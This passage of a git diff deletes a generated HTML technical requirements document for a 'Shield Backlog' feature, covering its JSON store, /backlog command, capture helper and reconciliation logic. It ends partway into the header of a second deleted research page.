-<p><strong>In one line:</strong> a project-level &quot;later&quot; list (<code>docs/shield/backlog.json</code>) that
-captures future work from anywhere in the Shield workflow, shows it ordered with
-per-entry pipeline status, and prunes itself when that work lands in a plan — so
-ideas stop getting lost without becoming a graveyard.</p>
-</blockquote>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Project</td>
-<td>Shield</td>
-</tr>
-<tr>
-<td>Feature</td>
-<td><code>backlog-20260527</code></td>
-</tr>
-<tr>
-<td>Domain</td>
-<td>backend (Python)</td>
-</tr>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Linked PRD</td>
-<td><a href="../prd.md"><code>./prd.md</code></a> (reviewed <strong>Ready</strong>, composite 3.12)</td>
-</tr>
-<tr>
-<td>Linked plan</td>
-<td><a href="../plan.md"><code>./plan.md</code></a> · Sidecar: <a href="../plan.json"><code>./plan.json</code></a></td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-</tbody>
-</table>
-<h2 id="1-document-overview-document-overview">§1 Document Overview {#document-overview}</h2>
-<p>This TRD covers <strong>Shield Backlog v1</strong> — a single project-level store of future work,
-a <code>/backlog</code> command to view and curate it, a capture path callable by the user or by
-any Shield skill, a user-driven promotion path, and a reconciliation engine that prunes
-entries once their work commits to a plan. It is read by the Shield maintainer
-(@ashwinimanoj) and by any contributor implementing the <code>/backlog</code> command, the
-<code>backlog_store</code>, the <code>epic-suggester</code>, or the <code>reconciler</code>.</p>
-<p>It derives its problem framing, users, goals, and risks from the linked PRD
-(<a href="../prd.md"><code>./prd.md</code></a>, lean, reviewed Ready) and translates them into testable
-functional/non-functional requirements, a component design, and a ship plan. The
-execution breakdown (epics, stories, acceptance criteria) lives in
-<a href="../plan.md"><code>./plan.md</code></a> and its sidecar <a href="../plan.json"><code>./plan.json</code></a>; this document
-stays at the &quot;what fits where and why&quot; level — component-internal detail lives in the
-three LLD drafts (<a href="../lld-backlog-store.md"><code>./lld-backlog-store.md</code></a>,
-<a href="../lld-epic-suggester.md"><code>./lld-epic-suggester.md</code></a>,
-<a href="../lld-reconciler.md"><code>./lld-reconciler.md</code></a>).</p>
-<h2 id="2-problem-statement-problem-statement">§2 Problem Statement {#problem-statement}</h2>
-<p>Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) only acts on work that has
-<strong>already</strong> been decided on. There is no staging area <em>upstream</em> of it: <code>plan.json</code>
-holds only milestone-committed work, and <code>manifest.json</code> is an artifact index — neither
-models an un-triaged &quot;do this later&quot; item. The technical gap is therefore a missing
-<strong>ordered, project-level, persistent queue</strong> that any pipeline step (or the agent
-mid-task) can append to without derailing the current task, and that drains itself once
-an item's work reaches a plan.</p>
-<p>See PRD <a href="../prd.md">§3 Problem &amp; context</a> for the user-facing narrative (lost ideas,
-mid-<code>/implement</code> &quot;we should also handle X later&quot;, no consistent path from loose idea to
-planned stories). This section restates only the <em>engineering</em> shape of that gap: a
-capture-anywhere write surface + an ordered store + a removal gate keyed off existing
-Shield artifacts.</p>
-<h2 id="3-objective--scope-objective-scope">§3 Objective &amp; Scope {#objective-scope}</h2>
-<p>Deliver a global backlog store, a <code>/backlog</code> view/curate command, a
-user-and-agent capture path, a feature+epic association with agent suggestion, and a
-promotion+reconciliation loop that keeps the backlog reflecting only not-yet-committed
-work.</p>
-<p><strong>In scope</strong></p>
-<ul>
-<li>A single global store <code>docs/shield/backlog.json</code> with a versioned JSON Schema and a Python validator.</li>
-<li>A capture path: <code>/backlog add</code> (user) and a documented <code>capture()</code> write helper (skills/agent), atomic and validate-or-refuse.</li>
-<li><code>/backlog</code> view: ordered list, per-entry feature+epic+source, and pipeline-status badges read from <code>manifest.json</code>.</li>
-<li>Feature+epic association (either may be proposed-new) with exact-normalized agent suggestion.</li>
-<li>User-driven promotion (the user picks <code>/research</code>|<code>/prd</code>|<code>/plan</code>|<code>/implement</code>); a transient promotion reference.</li>
-<li>A reconciliation engine + eager prune, lazy sweep, manual remove, and a kill switch.</li>
-<li>An executable eval suite + version bump.</li>
-</ul>
-<p><strong>Out of scope</strong> (per PRD §6/§11)</p>
-<ul>
-<li>Hooks / automatic end-of-task surfacing machinery.</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>A status/workflow state machine; an audit trail for removed entries (manual remove is a plain delete in v1).</li>
-<li><code>/pm-sync</code> of backlog entries before promotion; cross-project/multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the <code>order</code> field; multi-writer locking (single-writer assumption — see §6 N1).</li>
-</ul>
-<h2 id="4-product-journey-product-journey">§4 Product Journey {#product-journey}</h2>
-<p><strong>Backend interpretation</strong> — the representative paths exercised by the change:</p>
-<ol>
-<li><strong>Capture (user).</strong> <code>/backlog add &quot;&lt;text&gt;&quot;</code> → <code>capture()</code> assigns a <code>uuid4</code> id and the
-next integer <code>order</code>, prompts for / accepts a feature + epic (proposed-new allowed),
-writes the full doc to <code>backlog.json.tmp</code>, then <code>os.replace()</code> → <code>backlog.json</code>.</li>
-<li><strong>Capture (agent).</strong> A Shield skill mid-task calls
-<code>capture(text, kind=…, feature=…, epic=…, source=&quot;agent&quot;)</code> and receives the entry id.
-Same atomic write; never blocks the current task.</li>
-<li><strong>View.</strong> <code>/backlog</code> reads <code>backlog.json</code> (validate-or-refuse), sorts by <code>order</code>, and
-for each entry looks up its feature in <code>manifest.json</code> to render
-<code>research ✓  prd ✓  plan –</code> style badges. A lazy reconciliation sweep runs over all
-entries (unless the kill switch has disabled it, F10) before rendering.</li>
-<li><strong>Promote.</strong> <code>/backlog promote &lt;id&gt;</code> launches the user-chosen Shield step and forwards
-<code>&lt;id&gt;</code> as a <strong>transient runtime reference</strong> (never stamped into <code>plan.json</code>).</li>
-<li><strong>Reconcile / prune.</strong> At the end of a promoted <code>/plan</code> or <code>/implement</code> run, if the run
-carried a promotion reference, the entry is pruned (eager). The <code>/backlog</code> view sweep is
-the lazy safety net. Both call the one reconciliation engine and log every removal.</li>
-<li><strong>Manual remove.</strong> <code>/backlog remove &lt;id&gt;</code> plain-deletes an entry (confirm-before-delete);
-<code>git revert</code> recovers it only if it had reached a commit.</li>
-</ol>
-<pre class="mermaid">flowchart LR
-  add[&quot;/backlog add (user)&quot;] --&gt; store[&quot;backlog.json (atomic write)&quot;]
-  skill[&quot;capture() (agent)&quot;] --&gt; store
-  store --&gt; view[&quot;/backlog view\n(ordered + status badges)&quot;]
-  man[&quot;manifest.json&quot;] --&gt; view
-  view --&gt; promote[&quot;/backlog promote &lt;id&gt;\n(transient reference)&quot;]
-  promote --&gt; step[&quot;/research | /prd | /plan | /implement&quot;]
-  step --&gt; recon[&quot;reconciliation engine&quot;]
-  view -. lazy sweep .-&gt; recon
-  recon --&gt; store
-</pre>
-<h2 id="5-functional-requirements-functional-requirements">§5 Functional Requirements {#functional-requirements}</h2>
-<p><strong>Backend interpretation</strong> — each item is a verifiable behavior:</p>
-<ul>
-<li><strong>F1.</strong> <code>backlog.json</code> validates against <code>shield/schema/backlog.schema.json</code>; an entry
-with an unknown <code>kind</code> (∉ {epic, story, task}) or <code>source</code> (∉ {user, agent}) is rejected
-with a named error.</li>
-<li><strong>F2.</strong> Entry <code>id</code> is a <code>uuid4</code> string; the <strong>validator</strong> (<code>validate_backlog.py</code>) rejects an
-<code>entries[]</code> array containing duplicate <code>id</code> values with the named error <code>duplicate_entry_id</code>.
-(JSON Schema draft 2020-12 <code>uniqueItems</code> is whole-item equality and cannot express
-property-level uniqueness, so this check lives in the validator, not the schema.)</li>
-<li><strong>F3.</strong> <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; str</code> appends one
-entry, assigns the next integer <code>order</code> and a fresh <code>uuid4</code> id, and returns that id. It is
-callable from <code>/backlog add</code> (source=user) and from any skill (source=agent).</li>
-<li><strong>F4.</strong> All writes are atomic: full document → <code>backlog.json.tmp</code> → <code>os.replace()</code>. A kill
-mid-write never leaves a corrupt <code>backlog.json</code> (at most a stray <code>.tmp</code>).</li>
-<li><strong>F5.</strong> Reads are validate-or-refuse: a malformed/partial <code>backlog.json</code> raises
-<code>BacklogInvalid</code> (named error), never a silent truncation or partial parse.</li>
-<li><strong>F6.</strong> Promotion forwards the entry id as a <strong>transient runtime reference only</strong>; neither
-<code>plan.json</code> nor any story record is mutated by promotion (the no-stamping trust boundary).</li>
-<li><strong>F7.</strong> Feature/epic suggestion uses <strong>exact normalized match</strong> (<code>casefold()</code> + collapsed
-whitespace) by <strong>name</strong>, for both existing and proposed-new epics. No fuzzy/token-overlap
-ranking. A tie (≥2 normalized matches) surfaces all tied candidates and auto-picks none;
-no match → the entry is captured proposed-new.</li>
-<li><strong>F8.</strong> The <strong>&quot;epic landed&quot; predicate</strong> (single source of truth, used by every removal path):
-an entry is removed iff an epic with the matching <strong>normalized-exact name</strong> is <strong>present in
-<code>plan.json.epics[]</code></strong>. The match is by <strong>name, not by the positional <code>EPIC-N</code> id</strong> — <code>EPIC-N</code>
-is a within-a-single-plan slot reassigned on every re-<code>/plan</code>, so it is not a stable cross-plan
-key (an epic reordered across a re-plan must still resolve by name). Story <code>status</code> is never
-consulted; a <code>prd</code>-only feature is never removed; ambiguity or no match → the entry stays.</li>
-<li><strong>F9.</strong> Eager prune (end of promoted <code>/plan</code>|<code>/implement</code>) and lazy sweep (<code>/backlog</code> view)
-are idempotent (remove-if-present) and call the same reconciliation engine. Every removal
-emits a structured log line: <code>{entry id, feature, epic, match-kind, triggering run, gating plan.json path}</code>.</li>
-<li><strong>F10.</strong> A <code>.shield.json</code> flag <code>backlog.auto_reconcile</code> (default <code>true</code>) disables both
-eager prune and lazy sweep when <code>false</code>, leaving manual remove functional.</li>
-</ul>
-<h2 id="6-non-functional-requirements-non-functional-requirements">§6 Non-Functional Requirements {#non-functional-requirements}</h2>
-<p><strong>Backend interpretation</strong> — measurable targets and guarantees:</p>
-<ul>
-<li><strong>N1 — Integrity under single-writer.</strong> Shield is single-actor (N5), so v1 assumes one
-writer: no lock. Correctness rests on full-doc → <code>.tmp</code> → <code>os.replace()</code> (atomic rename),
-validate-or-refuse reads, <strong>and a compare-before-replace check</strong>: <code>capture()</code>/<code>remove()</code>
-record the on-disk <code>schema_version</code>+entry-count (or mtime/hash) at read time and refuse the
-<code>os.replace()</code> (raising <code>BacklogInvalid</code>) if the file changed underneath. This converts a
-silent lost-update — the failure mode if N5 is violated — into a loud refusal <strong>without a
-lockfile</strong>. The concurrency eval (EPIC-4-S1) asserts the refusal fires and <strong>no entry is lost
-or corrupted</strong>. Multi-writer locking is deferred until Shield becomes multi-actor.</li>
-<li><strong>N2 — View latency.</strong> <code>/backlog</code> view + lazy sweep completes in <strong>≲ 1s</strong> for a backlog of
-≤ ~200 entries against a typical <code>manifest.json</code>. A debug-gated latency line reports actual
-view+sweep wall time so &quot;revisit if breached&quot; is falsifiable rather than impressionistic.</li>
-<li><strong>N3 — Drift tolerance / no-crash.</strong> An unrecognized <code>manifest.json</code> / <code>plan.json</code> shape is
-treated as <strong>doubt</strong> (entry stays) with a logged warning; reconciliation never raises on a
-shape it doesn't recognize.</li>
-<li><strong>N4 — Recoverability.</strong> <code>backlog.json</code> is git-tracked; a wrong removal that reached a commit
-is recoverable via <code>git revert</code>. For an <strong>end-of-run eager prune</strong> (which may fire before
-<code>backlog.json</code> is committed), the v1 recovery mechanism is the transient append-only
-<code>.shield/backlog-removed.log</code>: the pruned entry is appended <strong>before</strong> the destructive remove,
-and replaying the log restores it. Commit-before-prune was considered and rejected as a v1
-non-goal (it would force a possibly-dirty-tree commit on every prune and couple recovery to git
-state mid-<code>/implement</code>). A manual remove of an <em>uncommitted</em> entry is unrecoverable by design
-(documented).</li>
-<li><strong>N5 — Single-actor assumption.</strong> The whole concurrency posture (N1) and the no-lock design
-rest on Shield being driven by one actor at a time. This is stated as an assumption, not a
-guarantee; if violated, N1's mitigation must be revisited.</li>
-</ul>
-<h2 id="7-high-level-design-high-level-design">§7 High-Level Design {#high-level-design}</h2>
-<p><strong>Backend interpretation</strong> — components and the data they exchange. Three Python
-components plus the command/skill surface, all reading/writing the one store.</p>
-<pre><code>        ┌────────────────────────────────────────────────────────────┐
-        │  /backlog command  +  backlog SKILL.md  (add/view/remove/    │
-        │                       promote)                                │
-        └───────┬───────────────┬───────────────┬─────────────────────┘
-                │ capture()      │ view          │ promote(id)
-                ▼                ▼               ▼
-        ┌───────────────┐  ┌──────────────┐  (transient ref → /plan|/implement)
-        │ backlog-store │  │ epic-suggester│
-        │ (atomic R/W,  │  │ (manifest +   │
-        │  validate)    │  │  plan.json    │
-        │               │  │  exact-norm   │
-        │               │  │  match)       │
-        └──────┬────────┘  └──────┬────────┘
-               │ read/write       │ read
-               ▼                  ▼
-        ┌──────────────────────────────────────┐
-        │ docs/shield/backlog.json (ordered)    │
-        └──────────────────────────────────────┘
-               ▲                  ▲
-               │ remove-if-present│ read (epic-landed predicate, F8)
-        ┌──────┴────────┐         │
-        │  reconciler   │─────────┘  reads manifest.json (feature index)
-        │ (engine + eager│            + flagged plan.json (epics[])
-        │  prune + lazy  │
-        │  sweep + kill  │
-        │  switch + log) │
-        └────────────────┘
-</code></pre>
-<ul>
-<li><strong><code>backlog-store</code></strong> owns the store contract: schema, <code>capture()</code>, read (validate-or-refuse),
-remove, atomic write. It is the only writer of <code>backlog.json</code>.</li>
-<li><strong><code>epic-suggester</code></strong> is read-only: given capture text + a candidate feature, it scans
-<code>manifest.json</code> features and the feature's <code>plan.json</code> epics and returns exact-normalized
-candidates (F7). It never writes.</li>
-<li><strong><code>reconciler</code></strong> holds the engine (F8 predicate + never-remove-on-doubt + drift tolerance +
-removal logging) and the two triggers (eager prune, lazy sweep) gated by the kill switch (F10).
-It calls <code>backlog-store</code> to remove entries.</li>
-<li><strong><code>manifest.json</code></strong> is the <strong>feature index</strong> (does the feature exist? does it have a
-<code>plan.json</code>?). <strong><code>plan.json.epics[]</code></strong> is the <strong>removal gate</strong>. No ids are stamped into either.</li>
-</ul>
-<h2 id="8-alternatives-considered-alternatives-considered">§8 Alternatives Considered {#alternatives-considered}</h2>
-<ol>
-<li><strong>Stamp a backlog-entry id into <code>plan.json</code> / story records at promotion.</strong> Would make
-reconciliation a trivial id lookup. <strong>Rejected:</strong> it couples the pre-pipeline staging area
-into the committed plan format (a schema change to <code>plan.json</code>), pollutes the PM-sync surface,
-and breaks the &quot;no ids tracked&quot; PRD decision. Matching on feature (manifest) + epic name
-(plan) keeps the backlog a pure overlay (F6/F8).</li>
-<li><strong>Per-feature backlogs</strong> (a <code>backlog.json</code> per <code>docs/shield/&lt;feature&gt;/</code>). <strong>Rejected for v1:</strong>
-the dominant capture moment is &quot;future work with no feature yet,&quot; so a global store with a
-<em>proposed-new</em> feature association fits the actual flow; per-feature adds a global↔local
-promotion path with no v1 payoff.</li>
-<li><strong>A status/workflow state machine</strong> (<code>captured → triaged → promoted → done</code>). <strong>Rejected:</strong>
-the lifecycle is minimal — an entry exists until removed (promotion-prune, sweep, or manual).
-A state machine is unmeasurable scope creep against the §7 success metric.</li>
-<li><strong>A project-level epic index</strong> to avoid opening <code>plan.json</code> files during reconciliation.
-<strong>Rejected for v1</strong> (kept as PRD §9 open question): <code>manifest.json</code>-as-index + opening only
-<em>flagged</em> <code>plan.json</code> files is simpler and within the N2 budget; add the index only if N2 is
-breached (the debug latency line makes that decision data-driven).</li>
-<li><strong>A lockfile for concurrent writes.</strong> <strong>Rejected for v1:</strong> the single-actor assumption (N5)
-makes atomic-rename + validate-or-refuse sufficient (N1); a lock is dead weight until Shield
-is multi-actor.</li>
-</ol>
-<h2 id="9-cross-cutting-concerns-cross-cutting-concerns">§9 Cross-Cutting Concerns {#cross-cutting-concerns}</h2>
-<ul>
-<li><strong>Validation.</strong> One schema (<code>backlog.schema.json</code>) + one validator (<code>validate_backlog.py</code>)
-gate every read and the eval suite. Validate-or-refuse is the single integrity primitive.</li>
-<li><strong>Logging.</strong> Two logged surfaces: (a) every reconciliation <strong>removal</strong> with rationale
-(F9 structured line), and (b) every never-remove-on-doubt decision (N3 warning). Removals are
-never a silent <code>git diff</code>.</li>
-<li><strong>Configuration.</strong> <code>.shield.json</code> gains <code>backlog.auto_reconcile</code> (bool, default <code>true</code>) — the
-kill switch (F10). No secrets; the store is plaintext JSON, git-tracked.</li>
-<li><strong>Schema evolution.</strong> <code>schema_version</code> is set in v1 so future shape changes (priority buckets,
-audit trail) migrate read-old/write-new. v1 ships <strong>no live <code>migrate()</code> code</strong> — the policy is
-documented only (doc-only until <code>schema_version</code> 2), to avoid mistaking documentation for
-working code.</li>
-<li><strong>Recovery.</strong> N4 governs the destructive paths: an eager prune is recoverable from
-<code>.shield/backlog-removed.log</code> (or <code>git revert</code> once committed); manual-remove-of-uncommitted is unrecoverable by design.</li>
-</ul>
-<h2 id="10-milestones-milestones">§10 Milestones {#milestones}</h2>
-<p>The ship plan below is <strong>rendered from <code>plan.json</code> <code>milestones[]</code></strong> — it is the structured
-source of truth. Do not hand-edit the region between the markers; edit <code>plan.json</code> and re-run
-<code>/plan</code> to refresh it. Exit criteria tie back to §5 (F1–F10) and §6 (N1–N5).</p>
-<!-- BEGIN rendered:milestones — do not edit, regenerated by /plan from plan.json -->
-<h3 id="m1--capture--store--view--no-deps">M1 — Capture + store + view  <em>(no deps)</em></h3>
-<p><strong>Outcome:</strong> A global docs/shield/backlog.json exists; entries can be added (user + agent) with order, kind, source, and a feature + epic association; /backlog renders the ordered list with per-entry pipeline status from manifest.json; an entry can be manually removed.</p>
-<p><strong>Exit criteria:</strong></p>
-<ul>
-<li>backlog.json has a documented JSON Schema with a top-level schema_version and per-entry {id, order, kind, source, feature, epic, text}; ids are unique across entries[]; shield/scripts/validate_backlog.py exits 0 on valid and non-zero with a named error on invalid.</li>
-<li>An entry can be captured both from the user (/backlog add) and from a Shield skill via the documented write helper; the write is atomic (temp-then-rename) and validate-or-refuse.</li>
-<li>/backlog renders entries in order with each entry's feature + epic and a research/prd/plan status read from manifest.json.</li>
-<li>/backlog can remove an entry by id (plain delete; no retained history).</li>
-</ul>
-<h3 id="m2--feature--epic-association--suggestion--deps-m1">M2 — Feature + epic association + suggestion  <em>(deps M1)</em></h3>
-<p><strong>Outcome:</strong> Every entry references a feature and an epic (existing or proposed-new); the agent suggests a matching feature/epic by scanning manifest.json features and plan.json epics, and the user can accept, pick another, or create-new.</p>
-<p><strong>Exit criteria:</strong></p>
-<ul>
-<li>Capture prompts for (or accepts) a feature + epic; both may be proposed-new.</li>
-<li>The agent proposes &gt;=1 candidate feature (from manifest.json) and &gt;=1 candidate epic (from the feature's plan.json) using exact-normalized match; the user can accept/replace/create-new.</li>
-<li>Suggestion never blocks capture — an entry can be captured with a proposed-new feature/epic when no match exists; a normalized-name tie surfaces all tied candidates and auto-picks none.</li>
-</ul>
-<h3 id="m3--promotion--reconciliation--deps-m2">M3 — Promotion + reconciliation  <em>(deps M2)</em></h3>
-<p><strong>Outcome:</strong> The user promotes an entry by starting /research, /prd, /plan, or /implement from it; the entry is removed when its work commits — eagerly at the end of the promoted /plan or /implement run, lazily on the /backlog sweep, or manually. Reconciliation matches by feature (manifest) + epic (plan.json) and never removes on doubt.</p>
-<p><strong>Exit criteria:</strong></p>
-<ul>
-<li>Promoting an entry passes it as a transient reference to /plan or /implement; on success that entry is pruned (eager).</li>
-<li>The /backlog sweep removes any entry whose epic's work now appears in the feature's plan.json (lazy safety net); a prd-only feature is NOT removed.</li>
-<li>Match key: both existing and proposed-new entries match by casefold+collapsed-whitespace exact epic NAME (never by positional epic id); on ambiguity or no match the entry stays.</li>
-<li>Eager prune and lazy sweep are idempotent (remove-if-present), share one reconciliation engine, log every removal with rationale, and treat an unrecognized manifest.json/plan.json shape as doubt (entry stays), never crashing.</li>
-<li>A .shield.json kill switch (backlog.auto_reconcile=false), made schema-valid by an additive 'backlog' object in shield.schema.json, disables eager prune and lazy sweep, leaving manual-remove only.</li>
-<li>An executable eval exercises capture (user + skill), view+status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), and recovery-rehearsal with a RED-&gt;GREEN trail; the Shield plugin version is bumped per CLAUDE.md.</li>
-</ul>
-<!-- END rendered:milestones -->
-<h2 id="11-apis-involved-apis-involved">§11 APIs Involved {#apis-involved}</h2>
-<p><strong>Backend interpretation</strong> — the interface surface. Component-internal detail lives in the
-LLD drafts; this is the boundary contract.</p>
-<h3 id="backlogjson-document-shape"><code>backlog.json</code> document shape</h3>
-<pre><code class="language-jsonc">{
-  &quot;schema_version&quot;: 1,
-  &quot;entries&quot;: [
-    {
-      &quot;id&quot;: &quot;f47ac10b-58cc-4372-a567-0e02b2c3d479&quot;,  // uuid4 string, unique across entries[]
-      &quot;order&quot;: 10,                                     // integer; ascending = view order
-      &quot;kind&quot;: &quot;epic&quot;,                                  // enum: epic | story | task
-      &quot;source&quot;: &quot;agent&quot;,                               // enum: user | agent
-      &quot;feature&quot;: &quot;billing-retries&quot;,                    // feature folder slug (proposed-new allowed)
-      &quot;epic&quot;: &quot;EPIC-2&quot;,                                // epic id (existing) or name (proposed-new)
-      &quot;text&quot;: &quot;Add exponential backoff to webhook retries&quot;
-    }
-  ]
-}
-</code></pre>
-<h3 id="backlog_store-write-helper-locked--plan-review-2026-05-27"><code>backlog_store</code> write helper (LOCKED — plan-review 2026-05-27)</h3>
-<pre><code class="language-python">def capture(
-    text: str,
-    *,
-    kind: str = &quot;task&quot;,          # epic | story | task
-    feature: str | None = None,  # None ⇒ prompt / proposed-new at capture
-    epic: str | None = None,
-    source: str,                 # user | agent  (required, keyword-only)
-) -&gt; str:                        # returns the new entry's uuid4 id
-    &quot;&quot;&quot;Append one entry atomically. Raises BacklogInvalid on a malformed/partial store.&quot;&quot;&quot;
-</code></pre>
-<p>Every capturing skill builds against this signature. Companion store operations:
-<code>read() -&gt; dict</code> (validate-or-refuse, raises <code>BacklogInvalid</code>), <code>remove(entry_id) -&gt; bool</code>
-(remove-if-present, idempotent).</p>
-<h3 id="cli-surface-backlog">CLI surface (<code>/backlog</code>)</h3>
-<table>
-<thead>
-<tr>
-<th>Command</th>
-<th>Behavior</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><code>/backlog</code></td>
-<td>View ordered list + per-entry feature/epic/source + manifest status badges; runs the lazy sweep unless the kill switch has disabled it (F10).</td>
-</tr>
-<tr>
-<td><code>/backlog add &quot;&lt;text&gt;&quot;</code></td>
-<td><code>capture(..., source=&quot;user&quot;)</code>; prompts for feature+epic with agent suggestion.</td>
-</tr>
-<tr>
-<td><code>/backlog remove &lt;id&gt;</code></td>
-<td>Confirm-then-plain-delete (<code>remove(id)</code>).</td>
-</tr>
-<tr>
-<td><code>/backlog promote &lt;id&gt;</code></td>
-<td>Launch user-chosen step; forward <code>&lt;id&gt;</code> as transient reference (no stamping).</td>
-</tr>
-</tbody>
-</table>
-<h3 id="manifestjson-read-contract-consumed-not-owned"><code>manifest.json</code> read-contract (consumed, not owned)</h3>
-<p>The backlog reads — never writes — the existing <code>manifest.json</code>. Its real shape is pinned here
-so EPIC-2-S1 (status badges) and EPIC-3-S2 (reconciliation) build against ground truth rather
-than reverse-engineering the live file:</p>
-<pre><code class="language-jsonc">{
-  &quot;schema_version&quot;: 2,
-  &quot;features&quot;: [                       // a LIST keyed by name, not a feature-keyed map
-    {
-      &quot;name&quot;: &quot;billing-retries&quot;,      // == the docs/shield/&lt;feature&gt;/ folder slug (invariant)
-      &quot;artifacts&quot;: {                  // booleans, not paths
-        &quot;research&quot;: false,
-        &quot;prd&quot;: true,
-        &quot;plan_json&quot;: true,            // the flag the reconciler gates &quot;has a plan?&quot; on
-        &quot;plan_md&quot;: true,
-        &quot;plan_arch_md&quot;: false
-      },
-      &quot;reviews&quot;: { /* ... */ },
-      &quot;updated&quot;: &quot;2026-05-29T00:00:00+00:00&quot;
-    }
-  ]
-}
-</code></pre>
-<p>Key facts the components rely on: <code>features</code> is a <strong>list keyed by <code>name</code></strong>; <code>name</code> <strong>is</strong> the
-feature folder slug (the reconciliation key); <code>artifacts.plan_json</code> is a <strong>boolean</strong> flag, and
-the manifest does <strong>not</strong> store a plan path — the reconciler <strong>derives</strong> <code>docs/shield/&lt;name&gt;/plan.json</code>.</p>
-<h3 id="reconciler-engine-entry-point"><code>reconciler</code> engine entry point</h3>
-<p><code>reconcile(entry, *, manifest: dict, plans: dict[str, dict]) -&gt; RemovalDecision</code> — applies the
-F8 &quot;epic landed&quot; predicate. <code>manifest</code> is the parsed document above; <code>plans</code> is a
-<code>{feature-slug → parsed plan.json}</code> map the trigger populates by reading <code>docs/shield/&lt;slug&gt;/plan.json</code>
-for each feature whose <code>artifacts.plan_json == true</code>. Returns <code>REMOVE</code> / <code>STAY_AMBIGUOUS</code> /
-<code>STAY_NO_MATCH</code> / <code>STAY_DOUBT</code>, each carrying the rationale fields for the F9 log line
-(<code>{entry id, feature, epic, match-kind, triggering run, gating plan.json path}</code>). Pure function
-over already-read documents (testable without IO).</p>
-<h2 id="12-open-questions-open-questions">§12 Open Questions {#open-questions}</h2>
-<ol>
-<li><strong>Feature/epic discovery cost (PRD §9).</strong> Confirming a proposed-new epic means opening the
-<code>plan.json</code> the manifest flags as having one. <em>Lean:</em> manifest-as-index, open only flagged
-plans; add a project-level epic index only if N2 is breached. <strong>Resolve-by:</strong> after M1, from
-the N2 debug latency line.</li>
-<li><strong>Dropped/rejected terminal state (PRD §9).</strong> Is plain-delete enough, or do we need an explicit
-&quot;decided against&quot; state? <strong>Resolve-by:</strong> deferred to post-v1 (PRD §11 out-of-scope); revisit if
-the §7 metric shows entries being silently deleted rather than promoted.</li>
-<li><s>Capture-from-skill interface</s> — <strong>closed</strong> by F3 / EPIC-1-S2 (the <code>capture()</code> signature is
-locked).</li>
-</ol>
-<h2 id="13-references-references">§13 References {#references}</h2>
-<ul>
-<li>PRD: <a href="../prd.md"><code>./prd.md</code></a> (lean, reviewed Ready, composite 3.12)</li>
-<li>Execution plan: <a href="../plan.md"><code>./plan.md</code></a> · Sidecar: <a href="../plan.json"><code>./plan.json</code></a></li>
-<li>LLD drafts: <a href="../lld-backlog-store.md"><code>./lld-backlog-store.md</code></a>,
-<a href="../lld-epic-suggester.md"><code>./lld-epic-suggester.md</code></a>,
-<a href="../lld-reconciler.md"><code>./lld-reconciler.md</code></a></li>
-<li>Plan review: <a href="../reviews/plan/2026-05-27/summary.md"><code>./reviews/plan/2026-05-27/summary.md</code></a> (Ready, composite 3.14)</li>
-<li>PRD review: <a href="../reviews/prd/2026-05-27_2/summary.md"><code>./reviews/prd/2026-05-27_2/summary.md</code></a></li>
-<li>CLAUDE.md — mandatory eval-coverage policy; Shield versioning (<code>.claude-plugin/marketplace.json</code>).</li>
-<li>Existing Shield schemas read by reconciliation: <code>manifest.json</code> (feature index), <code>plan.json</code> (<code>epics[]</code> gate).</li>
-</ul>
-<h2 id="14-rollback-strategy-rollback-strategy">§14 Rollback Strategy {#rollback-strategy}</h2>
-<p><strong>Backend interpretation</strong> — the change is additive (new store, new command, new scripts) and
-ships behind observable triggers.</p>
-<p><strong>Steps to undo:</strong></p>
-<ol>
-<li><strong>Disable reconciliation without uninstalling:</strong> set <code>.shield.json</code>
-<code>backlog.auto_reconcile = false</code> (F10). Eager prune and lazy sweep stop; manual remove and
-capture/view still work. This is the first-line mitigation for a misbehaving reconciler.</li>
-<li><strong>Recover a wrongly-removed entry:</strong> replay it from <code>.shield/backlog-removed.log</code> (the v1
-recovery mechanism — appended before every destructive prune, N4), or <code>git revert</code> the commit
-that dropped it if the removal had already been committed.</li>
-<li><strong>Full feature back-out:</strong> revert the feature PR — removes <code>/backlog</code>, the scripts, and the
-schema. <code>backlog.json</code> itself is plain data; deleting it loses only captured entries (which are
-recoverable from git history while the file was tracked).</li>
-</ol>
-<p><strong>Triggers (observable):</strong></p>
-<ul>
-<li>Reconciliation removes an entry whose work is <em>not</em> in any <code>plan.json</code> (a confident-but-wrong
-removal) — surfaced by the F9 removal log → flip the kill switch, then <code>git revert</code>.</li>
-<li><code>/backlog</code> view+sweep exceeds the N2 ~1s budget (debug latency line) → flip the kill switch and
-evaluate the project-level epic index (§12 Q1).</li>
-<li>The eval suite (EPIC-4-S1) regresses on concurrency/no-lost-entry, no-stamping (F6), or
-never-remove-on-doubt → block release / revert the offending change.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/devcontainer-implement-20260518/outputs/research.html b/docs/shield/devcontainer-implement-20260518/outputs/research.html
deleted file mode 100644
index 3a22c98b..00000000
--- a/docs/shield/devcontainer-implement-20260518/outputs/research.html
+++ /dev/null
@@ -1,324 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Research — devcontainer-implement-20260518</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
